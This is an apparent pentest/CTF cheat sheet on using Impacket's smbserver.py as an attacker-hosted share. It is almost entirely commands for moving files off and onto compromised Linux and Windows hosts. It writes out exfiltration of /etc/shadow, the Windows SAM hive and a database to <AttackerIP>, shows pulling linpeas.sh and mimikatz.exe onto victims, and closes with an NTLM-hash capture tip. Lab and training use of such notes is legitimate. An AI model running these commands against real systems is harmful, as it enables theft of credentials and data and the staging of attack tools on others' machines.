smbserver-py.md (3885B)
1 --- 2 title: "smbserver.py" 3 description: "Run this on your attacking machine (macOS/Linux) to host the files." 4 category: tools 5 tags: ["tools"] 6 tools: ["Impacket", "Mimikatz", "PowerShell"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Tools/smbserver.py.md" 10 --- 11 # 📂 Impacket smbserver.py Usage Guide 12 13 > [!WARNING] macOS Users 14 > Before running the server, ensure native **File Sharing** is turned **OFF** in System Settings, or you will get an `Address already in use` error on port 445. 15 16 ## 1. Start the SMB Server (Attacker Machine) 17 18 Run this on your attacking machine (macOS/Linux) to host the files. 19 20 **The "Compatible" Command (Recommended)** 21 This enables SMBv2 (for modern Windows) and sets a username/password to bypass "Guest Access" security policies. 22 23 ```bash 24 # Syntax: sudo smbserver.py <ShareName> <LocalDirectory> -smb2support -user <User> -password <Pass> 25 sudo smbserver.py SHARE . -smb2support -user temp -password temp 26 ``` 27 28 **The "Legacy" Command** 29 Only use this for Windows XP / Server 2003 (SMBv1). 30 ```bash 31 sudo smbserver.py SHARE . 32 ``` 33 34 --- 35 36 ## 2. Transferring Files FROM Linux (Victim) 37 38 Assuming you have a shell on a Linux victim and want to send files **TO** your `smbserver`. 39 40 ### Method A: Using `smbclient` (Standard) 41 Most common method. Does not require root. 42 43 **Upload a file to your server:** 44 ```bash 45 # Syntax: smbclient //<AttackerIP>/<ShareName> -U <User> -c 'put <FileToSend>' 46 smbclient //<AttackerIP>/SHARE -U temp -c 'put /etc/shadow' 47 # Enter password 'temp' when prompted 48 ``` 49 50 **Download a file from your server:** 51 ```bash 52 smbclient //<AttackerIP>/SHARE -U temp -c 'get linpeas.sh' 53 ``` 54 55 ### Method B: Mounting (Requires Root) 56 Mounts your share to a local folder on the victim. 57 ```bash 58 mkdir /tmp/transfer 59 mount -t cifs //<AttackerIP>/SHARE /tmp/transfer -o username=temp,password=temp,vers=3.0 60 61 # Now just copy files normally 62 cp /root/proof.txt /tmp/transfer/ 63 ``` 64 65 --- 66 67 ## 3. Transferring Files FROM Windows (Victim) 68 69 Assuming you have a shell on a Windows victim and want to send files **TO** your `smbserver`. 70 71 ### Method A: `net use` (Mount Drive) 72 The most reliable method. Maps your share to a drive letter (e.g., `Z:`). 73 74 1. **Connect:** 75 ```cmd 76 net use Z: \\<AttackerIP>\SHARE /user:temp temp 77 ``` 78 2. **Transfer (Copy/Move):** 79 ```cmd 80 copy C:\Users\Administrator\Desktop\flag.txt Z:\ 81 move Z:\exploit.exe C:\Windows\Temp\ 82 ``` 83 3. **Disconnect:** 84 ```cmd 85 net use Z: /delete 86 ``` 87 88 ### Method B: Direct Copy (UNC Path) 89 Quick for single files without mounting a drive. 90 ```cmd 91 copy C:\Windows\System32\config\SAM \\<AttackerIP>\SHARE\SAM 92 ``` 93 94 ### Method C: PowerShell 95 If CMD is blocked or you prefer PS. 96 ```powershell 97 # Create credential object 98 $pass = ConvertTo-SecureString "temp" -AsPlainText -Force 99 $cred = New-Object System.Management.Automation.PSCredential("temp", $pass) 100 101 # Copy to your server 102 Copy-Item "C:\Secret\data.db" -Destination "\\<AttackerIP>\SHARE\data.db" -Credential $cred 103 104 # Copy from your server 105 Copy-Item "\\<AttackerIP>\SHARE\mimikatz.exe" -Destination "C:\Temp\" -Credential $cred 106 ``` 107 108 --- 109 110 ## ⚡ Cheat Sheet 111 112 | Action | OS | Command | 113 | :--- | :--- | :--- | 114 | **Start Server** | Attacker | `sudo smbserver.py SHARE . -smb2support -user temp -password temp` | 115 | **Start (Legacy)** | Attacker | `sudo smbserver.py SHARE .` | 116 | **Mount Share** | Win Client | `net use Z: \\<IP>\SHARE /user:temp temp` | 117 | **Unmount** | Win Client | `net use Z: /delete` | 118 | **Quick Upload** | Win Client | `copy file.txt \\<IP>\SHARE\` | 119 | **Quick Download** | Win Client | `copy \\<IP>\SHARE\file.exe .` | 120 | **Upload** | Linux Client | `smbclient //<IP>/SHARE -U temp -c 'put file.txt'` | 121 | **Download** | Linux Client | `smbclient //<IP>/SHARE -U temp -c 'get file.txt'` | 122 | **NTLM Capture** | Attacker | Start server *without* `-user/-password`, then trigger any connection from Windows client. | 123 ```